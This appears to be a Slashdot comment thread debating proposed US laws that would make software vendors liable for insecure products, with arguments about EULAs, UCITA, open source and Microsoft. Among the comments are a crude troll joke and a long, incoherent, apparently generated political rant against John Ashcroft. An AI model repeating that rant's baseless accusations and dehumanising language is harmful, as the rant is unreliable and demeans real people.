Laws to Punish Insecure Software Vendors?
Gambit Thirty-Two writes "An influential body of researchers is calling on the US Government to draft laws that would punish software firms that do not do enough to make their products secure."
Yeah that'll work.
A visiting professor at the University of Alabama is giving a seminar on the supernatural. To get a feel for his audience, he asks:
"How many people here believe in ghosts?" About 90 students raise their hands.
"Well that's a good start. Out of those of you who believe in ghosts, do any of you think you've ever seen a ghost?" About 40 students raise their hands.
"That's really good. I'm really glad you take this seriously. Has anyone here ever talked to a ghost?" 15 students raise their hands.
"That's a great response. Has anyone here ever touched a ghost?" 3 students raise their hands.
"That's fantastic. But let me ask you one question further... Have any of you ever made love to a ghost?"
One student in the back raises his hand. The professor is astonished. He takes off glasses, takes a step back, and says,
"Son, all the years I've been giving this lecture, no one has ever claimed to have slept with a ghost. You've got to come up here and tell us about your experience."
The redneck student replies with a nod and begins to make his way up to the podium.
The professor says, "Well, tell us what it's like to have sex with a Ghost."
The student replies, "Ghost?!? I thought you said 'goats'."
Slashdot, come for the goatse, stay for the trolls.
What will this mean for open source? OSS companies/programmers will be just as liable as closed source ones.
So this means that if I configure my computer without a password I can sue the manufacturer for defective security in their software if it gets hacked.... Cool
</SARCASM>
I will bend your mind with my spoon
Aimed at Microsoft, George Bush's friends in Redmond. Asking for them and others to actually produce secure and reliable software, and making them responsible for their actions.
Sounds ridiculous that this shouldn't already be covered by things like Consumer Protection but in fact those licenses make sure that they have no responsibilities. And no-one is going to change that in the US when there is a president who doesn't want to prosecute for monopolistic practice the bigger violator of security concerns out there.
An Eye for an Eye will make the whole world blind - Gandhi
How do you quantify what is doing enough? If they release a patch in two weeks is that enough? How about 4? Is releasing a patch not enough? Should they actually call people and tell them to install a patch that has been out for months? I mean there is no doubting that Microsoft software has holes but they do patch them. The question is do they do it fast enough and do they make it required for users.
Be careful what powers you give to the government.
So, if a law like this is passed, will the people who break it be branded IT Terrorists? I mean, everything else is terrorism now, why stop here?
Oh goody, now software developers will be afraid to make good programs so now we will have a million half done unpublished programs. The only one that should be affected by this is Microsoft. That's where the whole security problem is.
Gizmo
Linux, Solaris, HP-UX, MS Windows and a bunch of other products have holes in them that SANS tells others about. Has there ever been a piece of software with no security holes?
Your software is insecure. Please pay your fine by credit card at http:// ...
Sigs are so 1990s. No way would I be seen dead with one.
It's always interesting when those who call for freedom and security for themselves can only figure out how to do it by reducing the freedom of others. Now they want to legislate software standards? Come on, you have to be against that.
I think I'll stop here.
If this passes, the first thing they should do is sue the entire internet due to its inherent open-ness - it just lends itself to insecurity.
Nope, not me, I must be someone else...
Reconsidering that plaintext cookie in my browser that holds my account password, are we?
--
What happens when you outlaw guns
This is definitely a double edged sword. This could bite anyone on the ass. MS doesn't hold a monopoly on crap code (arguable). What happens to people who don't sell the software, but wrote and make money on its support? (I'm thinking of Apache here).
So.. if a company lobbies against this law, wouldn't that open them up to criticism? I mean, it'd essentially be like them saying "we don't want to be responsible for our insecure software."
This raises some constitutional issues - Do I have the right of freedom of speech ( as code has been found to be in some cases ) to utter an incorrect program?
An additional question would be should all software now come with a warranty that specifically disclaims the implied warranty and states that there is no warranty? Would it be legal under the proposal?
There's a gorilla from Manilla who's a fella that stinks of vanilla and has salmonella.
Any computer anywhere can be hacked by anyone. The only difference between Grandma's computer holding her apple pie recipe and NORAD's computers storing the nuclear launch codes is accessibility.
Think about that the next time you champion the cause of punishing the programmers that make a piece of software...
I'm the tasty treat nobody can resist!
IM Me! AOL IM:Tasty Beef Jerky
Seems to me this will have the least impact on those who need to pay attention to security the most (large software companies) while having the potential to make it harder for the "little guy" to write and publish software.
No, Thursday's out. How about never - is never good for you?
And who would decide which software was 'secure' and 'non-secure'? What is secure to some, is totally insecure to others.
Anyone ever read their full End User Licence Agreements, especially MS?
It always has a limit that anything bad that happens while using their product is not their fault.
Now IANAL but I thought that by clicking I Agree, that you were actually agreeing to that.
I suspect that this would ensure far less software gets produced by smaller vendors and individuals who can't afford the liability.
Another good move for corporate America.
Microsoft is able to defend itself against the government. Are you?
My poetry site welcomes the unusual.
"Possible options include steps that would increase the exposure of software and systems vendors and system operators to liability for system breaches," wrote the authors of the report.
Maybe that's some incentive for the sysadmins to get off their a$$es and apply some patches which should have been applied a long time ago. Isn't that what they're paid for?
I hope that M$, as well as having to work out their other legal issues will do something about how their products can be easily 'hacked' into bringing things down.
Or they will make fewer things that would be in a position to be taken down (linux w/apache works, who needs a M$ server?)
I think I am asking too much.
But Windows XP is not the only Microsoft product with security failings.
For example Microsoft Bob.
I've been waiting for a service pack for it for years. I'm just not as comfortable hooking Bob up to the internet as I once was. Bob has gotten more viral infections than an old French Whore in a port town.
-Rothfuss
draft laws that would punish software firms that do not do enough to make their products secure
What, legally require things like DRM?
No, I know what it means. Who's going to check out all this software? Are we going to have a Federal Department of Bug-Finding, which employs 57,000 people trying to write Code Red 3?
How will this result in anything other than higher prices and no change in the "security" of software?
You are in a maze of twisty little passages, all alike.
BWAHAHAHAHAHAHAHA! http://www.sans.org/topten.htm
Perhaps it would be better to spend time and money focusing on educating the people who run insecure software/hardware. I don't really know how you'd go about enforcing it except to hold people liable for any problems caused by cracked servers.
Imperium et libertas
Autocracy and freedom
Laws that make a vendor produce a secure and safe product should apply to software too.
Ford and GM shouldn't be allowed to produce cars that kill people, simply because they couldn't be bothered to make them safer - like exploding gas tanks - ok, so that's not such a great example... (grin)
But really, but the responsibility where it lies. If I put a system out on the net, and don't take some steps to make it secure, I should be liable for damages it causes when it's compromised. Same for SW companies. If you produce a product that doesn't meet the "reasonable" man test for care in producing the product, the maker should be liable for negligence.
I might go even further though, and add some criminal penalties too.
Software can be more reliable and bug-free and secure. (Go read the "Software Conspiracy") Sure it will cost more, but what do you think all the virus outbreaks cost business and individuals. It's just a hidden tax. MS (and others) are just shifting the burden of producing software that works to the users. It's cheaper for MS to produce the software, but lots more expensive for the user to use them.
Finally, the legal system _IS_ part of the free market. The threat and actual loss of damages to a plaintiff balance the system of the market. It's not just buyers and sellers - and a wild woolly mess...
It just bugs me when "free market" proponents want to proclaim that the courts are unnecessary in the free market - bull! They are important and the market will not function correctly without them!
I think a much better approach would be if companies had their software certified as secure. Just an independent group to come in and audit the release at varying levels of bulletproofedness.
It'd drive up software costs, but if consumers don't care to look for the "Certified Secure!" brand, why should the government force it?
I'm afraid that would go too far in the opposite direction. Let the consumer punish the software manufacturer for bad security by not buying said product (I know, this doesn't really work when monopolies are involved), don't get the government involved. I think this is a little like cutting off your head to spite your nose, or however that saying goes. I fear what this proposed law would do to OSS. Instead of this, why not just modify the DMCA and such so that stupid software vendors can't prosecute/persecute people who try to show the security flaws in their crap software. It really gets me miffed when companies (*COUGH*microsoft*COUGH*) try to cover up for their poor code by making "security" a four letter word. What utter flipping nonsense.
Do they really think more regulation is going to improve software? All this will do is make companies put time and effort into "compliance" instead of fixing problems users are asking for.
Free cell phone tracking
Sarcasm [mode on]
Luckily, Microsoft has never, ever neglected security issues. Their completely clean legal standing attests to that.
The US National Academy of Sciences (NAS) has released drafts of a report commissioned after 11 September to look at the state of America's computer systems.
If the USA Patriot Act could get passed after 9/11, so could this. Let's not forget that rationale goes the way of the buffalo in the months following an attack. And while I think a lot of software would be better than it is now if it were more secure, this wouldn't just affect MS.
Let's hope nothing comes of this, as it could mean lawsuits against anybody and everybody if any piece of data becomes available to the wrong party.
While the concept to "punish" vendors for flawed products is a good one, trying to get the _government_ to do it is a bad one. For one reason, the government is very easily corrupted, and often looks the other way.
A better solution is to allow people to sue software companies that produce software that does not do what it is supposed to do. For example, if Microsoft says they have the most secure servers on the market, they damn well better be that.
As soon as a few lawsuits are filed, things will change for the better. There's too much being "protected" by microsoft software for them to continue business-as-usual for long if they get sued for every nimda/code red/etc out there doing damage.
However, if the company puts out patches (such as through windowsupdate) and the user fails to apply them in a timely manner, it's the user that screwed the pooch, not the producer.
Its got a nice buffer exploit that is being ENTIRELY ignored today on /., because, hey, unix is perfect, right????
Where laws are concerned one must always tread carefully. What they are proposing is criminal penalties for security flaws. Imagine if the authors faced liability for writing ftpd with back doors in it. Would people still be willing to write free software if that little disclaimer doesn't work any more?
There is a long history of laws (e.g., Sherman Act) designed to limit corporations but instead limit individuals.
Trusty ol' Beeb.
I'm guessing you won't see this mentioned in any of the major U.S. media outlets, though.
Probably for the same reason the media never mention the fact that all those virii almost always affect only Micros~1 Windows users.
I'm not talking about an assumption by the media that everyone uses Windows. My guess is that even the threat of a lawsuit from the world's richest man is enough to keep things like this out of the papers. Not to mention all those advertising dollars.
We really need fair competition in computer software again. If there were reasonable alternatives (yes *we* know there are, but most companies are pretty clueless wrt actual computer-based solutions), there would be NO NEED for this law, as the better software *should* do better in the marketplace.
academicians who are, as usual, out of touch with the "real" world.
Thanks in advance,
Trying_to_keep_the_U.S._John_Katz_free_free_for more_than_2_years-spork.
Not to sound insensitive to the software security issue, but going down this path simply encourages massive efforts at hacking one camp's software to further one's own favorite.
Yes, people already do this, but to bring in the Gov't to be manipulated by these whims seems silly. Be responsible for your own security.
Ya Sure! You Betcha!, The_THOMAS
There is another angle on this story provided by the register in this article that talks about UCITA (Uniform Computer Information Transactions Act) currently under consideration by a number of states. It would add a notion of implied warranty to all software including open source. The point of view taken by the the Register is that these warranties would discourage volunteer contributions to open source projects because possible legal penalties (independent of whether the software was sold for money) would fall back on the developers. Of course, it is hard to imagine that closed-source companies would be in favor of implied warranties, but the Register's perspective is thought provoking for open source.
"Yeah, that'll work"? What do you mean by that, CmdrTaco? Is it sarcasm? Are you saying that laws drafted to enforce software security are bound to failure because software security is inherently difficult and all-too-easy to overlook? In that case, shouldn't Microsoft be cut a little slack for their recent security shortcomings by this standard? Oh, my bad. Microsoft == bad. I forgot I was reading /.
-------------------------
Stupid people suck.
How about laws to punish the vendors if they sell products that simply are full of bugs, crash all the time, but don't provide adequate support or fixes to their products (free of upgrade fees)? Security is just one problem. Let's get working software first.
That is unless of course the insecure products are made by a monopoly that illegally prevents competition .... but that's another story.
Translating this to the software world, frankly, makes my head explode just thinking about it. Consider:
I can see, perhaps, a public standards body to which software vendors could choose to submit their products. In this scheme the government could award some kind of 'certification label' that a vendor could use on their packaging, etc. indicating it's 'safe'. That would at least enable the marketplace to decide the importance of government certification. However, we'd still be left with the niggly questions of what 'safe' is and how we might determine 'safeness'. Maybe this is akin to 'quality' certification along the lines of ISO9001/2 processes(??).
CrazyLegs
"Pork!!" said the Fish, and we all laughed.
At first glance this seems aimed at Microsoft but it could have severe impacts on free software unless liability is limited to the price of the software for example. I think an argument for an exemption of open source could be made based on complete disclosure. This could have an interesting impact on free (as in beer) software though.
If a safe manufacturer makes a safe advertised as the "Fort-Knox" of safes, but there is a glitch that allows anyone to toggle the handle 3 times and Voila it opens, guess what, it's defective and depending on the result of that safe being opened they can be held liable, IF they were aware a problem exists.
Software vendors selling CRAP any 12 year old script kiddie can compromise NEED to be held accountable. XP Flaws, hell almost ALL windows security flaws are nothing more than a piss poor product. Needless to say you don't ever see life support equipment running off windows, unix, yes. windows, no....
But aside from my MS bash, this could have negative repercussions as well, Open Source software is EXPLICITLY offered with no suitability clauses, no warranty clauses etc, commercial products cannot do this, under the laws that govern this in the US at least, there is an appearance of support for commercial software, that is ENOUGH, even if they throw no warranty clauses in it. For example even under Lemon Laws for used cars, a dealer says AS IS NO WARRANTY, but on the window advertises ONE OWNER, that ONE OWNER statement in most states constitutes an implied warranty (I've pulled this card and won so don't tell me it doesn't). It may see a serious quash in innovation for commercial products.
There is more software than the OS itself, look at Checkpoint's flaw, they tout their software as secure, secure, secure, but then it turns out it has holes, just like any other. Guess what, it's a product defect, and hence they could be sued for damages, let's make those penalties MUCH STIFFER!
Open source also has the MAJOR advantage of extensive peer review, but that doesn't always work either, sendmail, dns, apache, all have been compromised at some time or another over the last few years, BUT they are opensource, and the USER HAS the ability to correct the problem themselves, not rely on a hodge podge commercial patch roll.
The COMMERCIAL software vendors need to be held accountable for product defects JUST as manufacturers of hard goods are.
Sig went tro...aahemmm.....fishing........
If they mean unhackable they're not going to get very far. So I don't think these people are going to be successful in getting these laws passed.
Why not, if you get a non-functional/debilitated automobile in most states the dealer is required to buy it back if they can't fix it quickly. If they can however, you keep the fixed car. What a concept!
These laws need to be aimed at software vendors who are irresponsible with their handling of security issues. Everything has security issues. Laws directed at vendors with security holes would screw a lot of people over. The handling and fixing of security holes should be somehow controlled. If there is a root exploit in my box, and it takes the vendor 4 weeks to tell me and another 1 week to release a patch then they should be held accountable. However, if the vendor as soon as they find out sends out an advisory and releases a patch as quickly as possible (or a solution to remedy the problem) then they should be safe. Laws like these sound good. But I'm starting to get scared. The legislative body has shown an incredible ignorance towards computing thus far, what makes this case any different?
--------========+++Dont Feed The Lab Techs+++========--------
to ban open source and free software. Here's why:
My complaint about John Ashcroft
May I be cynical for a bit? I hope you don't mind, but with Ashcroft's latest barrage of malodorous notions, I can't resist the urge to make a few cynical comments. To get right down to it, some of the facts I'm about to present may seem shocking. This they certainly are. However, it's time that a few facts had a chance to slip through the fusillade of hype.
What's my problem, then? Allow me to present it in the form of a question: Where are the people who are willing to stand up and acknowledge that Ashcroft, in his infinite wisdom, has decided to destroy the natural beauty of our parks and forests? On the surface, it would seem to have something to do with the way that his whole approach is repugnant. But upon further investigation, one will find that by allowing Ashcroft to put mephitic thoughts in our children's minds, we are allowing him to play puppet master.
As for the lies and exaggerations, Ashcroft's epigrams are rife with contradictions and difficulties; they're entirely maladroit, meet no objective criteria, and are unsuited for a supposedly educated population. And as if that weren't enough, if Ashcroft is going to obstruct important things, then he should at least have the self-respect to remind himself of a few things: First, a true enemy is better than a false friend. And second, many people respond to his debauched vituperations in much the same way that they respond to television dramas. They watch them; they talk about them; but they feel no overwhelming compulsion to do anything about them. That's why I insist we pronounce the truth and renounce the lies.
Even people who consider themselves scornful foolhardy-types generally agree that Ashcroft's slurs symbolize lawlessness, violence, and misguided rebellion -- extreme liberty for a few, even if the rest of us lose more than a little freedom. One might conclude that Ashcroft is incapable of writing a letter without using such phrases as "crapulous pop psychologists", "loquacious exhibitionists", "oppressive personae non gratae", or some combination thereof. Alternatively, one might conclude that Ashcroft has a different view of reality from the rest of us. In either case, if you're not part of the solution, then you're part of the problem. His historical record of fickle pleas is clearer than the muddled pronouncements of his apple-polishers for a variety of reasons. For instance, the worst sorts of inconsiderate Neanderthals there are must be treated with political justice, not with civil justice, as they are sincerely not real citizens. Let me rephrase that: I wonder if he really believes the things he says. He knows they're not true, doesn't he?
A complete answer to that question would take more space than I can afford, so I'll have to give you a simplified answer. For starters, if we let him cause riots in the streets, then greed, corruption, and tribalism will characterize the government. Oppressive measures will be directed against citizens. And lies and deceit will be the stock and trade of the media and educational institutions.
Even Ashcroft's bedfellows couldn't deal with the full impact of Ashcroft's refrains. That's why they created "Ashcroft-ism," which is just a garrulous excuse to force square pegs into round holes. He plans to drag everything that is truly great into the gutter. He has instructed his votaries not to discuss this or even admit to his plan's existence. Obviously, Ashcroft knows he has something to hide. Most of you reading this letter have your hearts in the right place. Now follow your hearts with actions. I have traveled the length and breadth of this country and talked with the best people. I can therefore assure you that Ashcroft's artifices cannot stand on their own merit. That's why they're dependent on elaborate artifices and explanatory stories to convince us that Ashcroft's warnings can give us deeper insights into the nature of reality. We can and we must protect ourselves by any means necessary against the unrestrained bestiality of stupid, quasi-macabre paper-pushers. And that's the honest truth.
Great, now when I want to release some software, it'll have to get licenced, and certified by some agency. I bet the "software review" will be just like an IRS audit. Then of course you'll get black market software, from the GNU, that will put you in jail if Microsoft finds out you're using it.
Linux is NOT immune to exploits coming out of the box. In fact, IIRC there were versions of Redhat that came with a lot of services enabled in a default config that could lead to even easier entry than a lot of Windows systems. Of course, it's since been corrected, but the point is that it does and can happen. Also, when people run apps as root, what else can you say but to say that people are stupid. Still, at least I can recompile my kernel to permanently disable the better chunk of the holes.
Well, providing that something like this has a chance of getting passed...
What are the odds of it being enforced on large corporations? Microsoft has been fighting the anti-trust case for how long now? Lawyers have a way of interpreting anything that's not very carefully worded any way their company wants.
Besides, I'd imagine that the wording of the rules would allow for unknown vulnerabilities. You can't really punish someone for a simple mistake. Yes, more than one of MS's security holes has been known by MS for longer than publicly known, but will they admit that they knew? Somehow I doubt it.
And what about patches? The laws would have to provide for the company to release a patch to solve the security problems. And in that case, whose fault is it when Code Red hits your company's web server? Is it the corporate megalith that released a bad piece of software, but provided a patch to solve this particular problem, or is it the lazy/incompetent sysadmin who didn't bother to keep his system up-to-date?
Now what about your everyday programmer? He contributes to an open-source project. A flaw is discovered, now who do you blame? The company who made the software? There may not be one. The organization? The guy who wrote that exact piece of code?
Besides, an open-source program that isn't kept up-to-date can have as many flaws as a program made by a large company. Again, it comes down to keeping current. And I don't expect my mother to update her Windows(R) unless I call her and tell her to.
Yes, I believe that Microsoft has released some gaping holes into the computing world, but the problem is going to be placing blame. And for the law to decide at what point it becomes so blatant that you can hold the software creator responsible.
And real basic liability -- their product does what their marketing claims say it will, or they fix it or take it back and provide some kind of refund.
I'm willing to accept that it may have defects that may cause problems, but the defects in the software should be fixable by the vendor.
I'm not willing to accept that the product has so many defects that it does not do what is claimed. I call that fraud.
This is bad news for anyone dabbling in software development, you make a piece of software to do something (in your opinion) useful, release it on your website where a few dozen download it, it spreads a bit more, and suddenly, someone somewhere does something that provokes your app to crash, or be used, in a nasty way taking out their box and the boxes on that network.
Now you suddenly find yourself with a fresh lawsuit in your mail claiming you're responsible for the couple hundred thousand dollars worth of damage done to a company in some remote place you've never heard of...
This sounds like an excellent way to deter anyone from ever releasing anything that's not tested and tested again, meaning development for a hobby will be a lot tougher.
I see a suggestion like this working only after a developer clearly states and guarantees that his software will not in any way harm the users equipment, or, very gross neglect from the developer and failing to provide even rudimentary security.
Wax-Museum Fire Results In Hundreds Of New Danny DeVito Statues
n/p
It's called the Free Market. Darwin wrote the laws a long time ago.
"i was saying gnu-rd"
The problem with security is not illegal hacking, it's just that we don't have enough laws! They can make laws all day, but something will always be cause for a security hole, no matter what extremes programmers go to... It's the nature of the business. The criminals are not the software developers (and not Microsoft, in this case), I think this should be obvious.
Ford can take all measures to make their vehicles safe, but if I drive down the road at 50 mph into a telephone pole I still may die. Is that Ford's fault? I think this idea is ludicrous.
[FromTheMorning]
Isn't this what the SSSCA is all about?
SSSCA == Security Systems Standards and Certification Act
The government legislation won't set standards. (Though if, as I propose, it makes a criminal standard it would.)
It makes it possible to sue the maker in CIVIL court. The only "standard" is the reasonable man test. Basically, right now, it's nearly impossible to sue software makers for bugs/defects. The proposed changes, as I read it, make it possible to take the SW maker to court to sue for negligence or making a defective product.
The same kind of laws should apply to software that apply to many other goods, though we might need some modifications.
This is what's so BAD about UCITA. It eliminates all of the "goods" style protections for software, and makes the sale a contract.
Software sales need to be moved four steps back to a sale of goods style sale. That will add back in protections and such that are available when you buy goods.
If we sold lawnmowers like software, you could buy a lawnmower, and it doesn't even run - or even wasn't capable of cutting grass in the basic design. Want your money back? NO! You pushed the lawnmower, so you can't have your money back. Sheesh - software can meet nearly all the terms of a "Goods" sale, and classifying them as "Non-Goods" is just a great way for the manufacturer to avoid taking responsibility for what they produced!
What if Linus got hauled into court after ext2fs ate someone's data?
Best Slashdot Co
The software producer's liability should be limited to the amount of their financial return on the software, except in cases where gross negligence is apparent. If I never made a dime off the sale of the software, I should be liable only for that $0.
Wow, quite a little tirade there.
Here's a little hint - let the free market system deal with it. That's how things are done in the US. If people don't think Microsoft is secure (as opposed to the _wonderful_ security history Unix vendors have had - please note dripping sarcasm) then buy other products.
Here's another little hint - your buddies at Sun just fell victim to a Solaris security hole
Open source developers face new warranty threat
Rosen and Kunze were attempting to secure an exemption from implied warranties of merchantability, fitness, or non-infringement for a computer program, "provided under a license that does not impose a license fee for the right to the source code, to make copies, to modify, and to distribute the computer program."
The proposal would have brought the rest of the States in line with Maryland.
The replacement version, which reads "or to distribute..." is joined by a provision that nullifies the exception for software licensed to consumer
The complete text can be found here....
a) Except as provided in subsection (b), the warranties under Sections 401, and 403 do not apply to a computer program if the licensor makes a copy of the program available to the licensee in a transaction in which there is no contract fee for the right to use, make copies of, modify, or distribute copies of the program.
(b) Subsection (a) does not apply if the copy of the computer program is contained in and sold or leased as part of goods or if the transaction is with a consumer licensee that is not a software developer.
...I would rather have the freedom to tell the big guys to screw off and go write my own free secure system with my buds, than to have to do my business with them or not at all because no one else (read: me, smaller vendors, etc.) can afford to meet the requirements of this law.
God forbid this ever gets put into action. Most knee-jerk MS haters will say this is a good thing, but it isn't. When Joe Schmoe loads up an open source program and gets hacked because he was ignorant of security issues then what? IIRC, ignorance of the law doesn't mean you can get away from it, correct? So, because some idiot doesn't know proper security, you are going to slam the guy or gal that made the software? Ludicrous. Besides, NO ONE can make software that can't be hacked. If you can, then maybe you should go talk to MS :)
Sent from your iPad.
The almighty M$ will just use their standard EULA loophole. I see it like this.
M$ holds no responsibility to the public or private use of the software about to be installed. If a security flaw is found, we at M$ hold no responsibility and cannot be sued for any reason. If the people persist, follow the next step.
Start, Settings, Control Panel, and then click on add/remove programs and then remove the offending program.
If the program does not uninstall at this time, please format your hard drive or any other media that the offending software was installed on.
If you agree that you cannot sue M$ for any reason please press the agree button, otherwise press cancel.
------88-------- Sig? Sorry, I don't smoke.
Do you really think that if this becomes a Bill with any serious chance of passing Microsoft won't have lobbied sufficiently to get it to pose a threat to its most serious competition? (Linux and OSS)
The market should work this issue out on its own if it is healthy.
If organizations want higher security, they won't buy the insecure products. Business that have been burned by Outlook/IIS/Windows in the past will move to alternatives: GroupWise/Apache/*NIX.
obviously no deficiencies vs. no obvious deficiencies
So now I can sue GM because someone stole my car. I can sue the cops for not being able to protect my car from thieves. I can sue the WTC architects because it wasn't secure enough.
A whole range of new lawsuits coming along for ambitious lawyers.
If laws are drafted that require a company be held financially (or possibly criminally) responsible for insecure software, how would you deal with systems such as Linux? One solution is to ban them altogether: if no punishment can be levied (because there's no company), then the product violates the law and cannot be distributed.
Also, how would this law affect the 800 page EULA that comes with every piece of purchased software? The way those agreements are worded the software could take over your computer and cause it to eat your face and the vendor could not be held responsible.
What I do want is to KNOW when a supposedly secure product has a security leak. Moreover, I want to know the ramifications of the issue, the patch progress, and current known virii/worms/other exploitations roaming around.
I really don't want to sue company X for making insecure software -- but I don't like the idea of them holding back on vulnerability announcements once they've been exploited.
That's ridiculous, how many times have you heard of a commercial company being liable for crappy products? How many products have MS released that have NOT worked as advertised, yet required consumers PAY to upgrade to a version that should have worked to begin with?
Besides that, all the software licenses (shrink wrap or no) basically say "we're not responsible".
Stupid sexy Flanders.
What about freeware or opensource software? If I get something for free and it's broke who am I to complain?
What will happen to people who release buggy software that's exploitable? Fines, throw 'em in jail to rot - or force them to stop making any more software to save the rest of humanity?
Man makes software, man travels to USA, software is exploited, man is arrested and left in jail for months.
I'm not against legislation for a company that forces its software on people for the "low low price of only 199$" and then says "duh, read the EULA" when it's buggy and/or doesn't work as it should, but don't jump on this as the way the world should be. You don't have to use Microsoft software, and if you do you should know to protect yourself, not sue when something doesn't work the way you want it to.
A company that thinks this is the way to fix bugs...I have no words.
I love you. Always. Forever.
I do think companies like Microsoft need to take more responsibility for the huge gaping security holes in their products, but I'm not sure legislation is the right way to go about it. I do think consumers need to be better informed. When Ford recalls a few vehicles over some potential safety hazard it's all over the evening news. But what about when a dangerous security hole is found in the world's most used operating system? The vast majority of users never even know about it.
Whatever happened to the good old days, where if a product was notoriously unsafe and insecure, that consumers simply refused to buy the product? The manufacturer's only choice then was to either fix the problems, or cease production.
If we bought cars with the same lack of discernment that we buy software, Chevrolet could bring back the Corvair.
Already a member of the Green Party, thanks.
Be careful what powers you let corporations have when you let them run amok without government regulation.
Remember "Bring 'em on"? *sigh
So would it be legal to hack again? Or would hacking a system to prove it's insecure cancel the other one out.
Should some massive security hole be discovered in Linux, FreeBSD, or other similar free operating systems, the law would most likely be ineffective in punishing anyone.
This could create a big loophole for Microsoft if they ever decided to evade the law by opening up Windows. But of course that is unlikely.
As for getting the law itself passed, it really depends on who has more influence on the lawmakers. Does Microsoft really have more influence with US lawmakers than their customer base?
END COMMUNICATION
I'm a windows programmer. I've done a number of server-based products for companies that have either deployed them in-house or licensed the product to other companies.
I do my best to prevent buffer overflows, and do robust error handling. I also, however, use third-party code.
So in this case, I'd have to increase my Errors and Omissions insurance coverage, and I'd have to audit all third-party code for security.
Of course, I'm still fucked since the OS vendor cannot even produce a C runtime that does not include buffer overflow problems.
Fuck programming, I'll work retail.
. . . we might want to consider that while "security" can mean keeping your machine from being 0wn3d, it can also mean "security" as in the Security Systems Standards and Certification Act, otherwise known as the "Enforced Copy Control and Free Operating System Elimination Act."
CEE5210S The signal SIGHUP was received.
Be careful what powers the governments assigns to its proxies.
...
Such as special dispensations to ignore normal contract law by selling "licenses", such as copyright, such as patent,
*Real* libertarians aren't as one sided as you seem to be. They actually believe in fewer laws of any kind, not just fewer of the kind favorable to their favorite soapbox.
Infuriate left and right
I hear a lot of people happy about the idea of going after M$ because they are the Evil Empire. I also hear a lot of people that are afraid of us open sourcers being attacked. Obviously, more secure and better written code should be standard.
I'm not so sure that liability isn't a good thing. I'm not saying that a programmer should be completely responsible for his/her code and any results that occur. I can instead think of a different situation. Imagine I produce a piece of software and sell it/give it away. I don't think it's a bad idea for me to be required to:
Now, of course end users will be responsible for installing patches, monitoring CERT advisories, etc. The end users are also responsible for attempting to avoid known bugs while waiting for a patch to become available. But, sometimes this isn't avoidable (think power generation system). If this particular bug is the cause, then by all means I think the users should be able to go after the company they PAID for damages. It's not like the software company didn't charge the end users to use the software. With those software rights, there really should be some sort of software liability (just like if I made a defective car, and then had to do a recall).
Long, cute, or funny Sigs are just another form of over compensation, used by geeks, nerdz, etc.
--
Damn the Emperor!
The researchers have good concerns and the idea isn't inherently bad. It's what happens between politicians and in the offices that worries me. What starts out as a way to make companies more responsible easily slips into quick sand. How in the world do you enforce security and by what standard. You can't say it's just about making it so consumers can sue big corporations, without a meaningful discussion about what constitutes good security in the first place.
Maybe instead of bailing out the airlines we should have fined them for making their planes and airports insecure...
www.lonseidman.com
It seems awfully excessive for this law to apply to ALL software. Applying this law to mission-critical enterprise server software makes a great deal of sense. Applying it to a small program like a text editor would be outrageous.
Also, will this law apply to consumer software as well as corporate software? If somebody hacks into my computer through a chess program that I'm running on Windows 98 while I'm connected to the internet, that doesn't constitute a breach of national security. If some cyber-terrorist breaks into the White House enterprise server and starts deleting critical government files, that's a different story altogether.
I'm betting that due to M$'s lobbying, this won't pass. After all, Gates' good buddy Dubya (George W. Bush) can veto any law that he wants, even if it managed to pass both houses of Congress. M$ would go out of business if this bill became law and were properly implemented. That's why it won't pass.
This space left intentionally blank.
Before you make such a half-ass guess at what "secure" means, why don't you read the article, which clearly points to the former, or "being 0wn3d" as you so cleaverly put it.
karma is for the weak >)
This would just impose another barrier to companies accepting open source software..
"What? It isn't Certified Secure?? Better go with Microsoft..."
And of course most OSS authors won't have the money to get the certification..
That sounds like a good idea at first, except that the whole issue of "secure systems" then gets turned over to lawyers for resolution. For the small development shop that translates to more money out the door for legal fees.
Taken one step farther, suppose that there is a large software developer with in-house lawyers and a bottomless bank account. Now if this law was on the books, this developer could use that law to bludgeon smaller shops to death with their lawyers in the endless pursuit of "secure systems." They would probably even get some good PR out of it, what with them protecting all the end users from "insecure systems."
No, somehow this doesn't seem to be a workable idea.
They could have a warning on the media or something to be read when installing it that it is not work. Kinda like the warning that tobacco is bad for you.
This is another one of those catch-all blanket decisions that seems all right at first thought, but if you apply it to all cases, you see that it is just disastrous. Let's look at who it affects the most:
BETA SOFTWARE
Well of course that has bugs. So we exempt this? OK, all (Microsoft) software will be beta
NEWBIE / EDUCATIONAL
Some newbie developer or uni student writes a piece of toy software and makes it available on his home page to boost his ego. Some other newbie academic downloads it and a bug in the "file manager" software deletes his C: drive.
Exempt educational software??
FREE BEER
Some people make software out of the goodness of their heart. "YMMV, maybe you like it maybe you don't. No warranty". Maybe it is superb. But it might have a horrendous bug. So people will no longer release freeware.
OPEN SOURCE
Same as above but with source open, people can deliberately find bugs and cry out. Worse, there is plenty of open source software in commercial use (Apache etc). What if in some new iteration of Apache, there is a security hole and this will happen. Can people sue for this?! Can people sue the developers who worked on it for free? What exemption do you want now?
MICROSOFT
Well, by now, OSS has dried up because everyone is too scared to give work away. Maybe top projects that have been so heavily scrutinised in the past might be ok (Apache, Linux Kernel). Microsoft might just last a little longer than expected due to security through obscurity but of course they too will perish
The end of software =)
After the US government begins its new laws in the area of data and intellectual property, i have some more they could add:
1. The Crap Film and Television Act will hold film-makers responsible for bad productions, bad acting, bad lighting and poor scripts. If someone passes out from boredom from watching a film, they can sue the studio.
2. The Invasive Pop-up Advertising Act, will ban all pop-up adverts. This will tie-in with the software laws, because pop-ups are technically software, and are insecure (in that they cause damage to my mouse).
3. The Insecure Boy-Band Act, will ensure that all boy-bands are securely locked-up. If a record company tries to bring them to a studio or gig, they will be punished.
This comment does not represent the views or opinions of the user.
What's "cleaverly?" Does that mean something related to Ward Cleaver, the patriarch of the television classic "Leave it to Beaver?"
CEE5210S The signal SIGHUP was received.
Are they serious? Can Clippy spread a virus? I never heard of that.
Ahhhh he's coming out of the computer....
- adam
Think carefully... how do you make software secure in the first place? Microsoft try to go through extensive software testing to detect bugs. Who knows, maybe if test software is good enough, they can catch most bugs
How does the OSS world make its software so secure? Through peer review. People find bugs and report them. With OSS these bugs are found fast. And these bugs get fixed fast. But what would be ludicrous would be to sue for bugs since at V1.0.0 there are bound to be bugs. Suing would kill the project. Peer review has made OSS strong and that is the way it should be.
